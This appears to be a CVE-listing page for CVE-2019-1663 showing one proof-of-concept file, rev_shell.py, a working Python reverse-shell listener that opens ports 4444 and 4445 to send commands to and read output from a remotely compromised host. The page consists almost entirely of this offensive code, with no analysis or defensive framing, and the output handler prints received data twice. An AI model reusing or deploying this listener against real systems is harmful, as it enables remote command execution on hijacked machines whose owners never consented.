5585 Total CVEs
26 Years
GitHub
Home / 2019 / CVE-2019-1663
README.md
Rendering markdown...
POC / rev_shell.py PY
⬇ Raw GitHub ✕ Close 
"""
Reverse Shell Listener
Author : KylVGoi

Note:
This listener handles bidirectional communication:
- Port 4444 : stdin sent to the remote shell
- Port 4445 : stdout received from the remote shell

TO DO : make it more intuitive with a menu + fix the quit cmd.
"""

import socket
import sys
import threading


host = ""          # to listen on all interfaces
port_in = 4444     # Port to send commands (stdin → remote)
port_out = 4445   # Port to receive output (remote → stdout)


def create_socket(port):
    """
    Creation of the socket
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, port))
    s.listen(5)
    print(f"Listening on port {port}...")
    return s

def handle_input(client_sock):
    """
    Send commands from local input to the remote shell.
    """
    try:
        while True:
            try:
                cmd = input("shell ▄︻デ══━一💥 > ").strip()
            except EOFError:
                break
            if cmd == "quit":
                client_sock.close()
                sys.exit()
            if cmd.strip() != "":
                client_sock.sendall(cmd.encode() + b"\n")
            
    except Exception as e:
        print(f"Input handler error: {e}")
        sys.exit()

def handle_output(client_sock):
    """
    Display stdout received from the remote shell.
    """
    try:
        while True:
            data = client_sock.recv(4096)
            if not data:
                break
            sys.stdout.write(data.decode(errors='ignore'))
            sys.stdout.flush()
            print(data.decode(), end="")
    except Exception as e:
        print(f"Output handler error: {e}")

def main():
    s_in = create_socket(port_in)
    s_out = create_socket(port_out)

    client_in, addr_in = s_in.accept()
    print(f"Connection established for input from {addr_in}")

    client_out, addr_out = s_out.accept()
    print(f"Connection established for output from {addr_out}")

    # Thread to send the commandes (stdin --> client)
    threading.Thread(target=handle_input, args=(client_in,), daemon=True).start()

    # Thread receive the output (client --> stdout)
    threading.Thread(target=handle_output, args=(client_out,), daemon=True).start()

    try:
        while True:
            pass
    except KeyboardInterrupt:
        print("Closing connections...")
        client_in.close()
        client_out.close()
        s_in.close()
        s_out.close()
        sys.exit()

if __name__ == "__main__":
    main()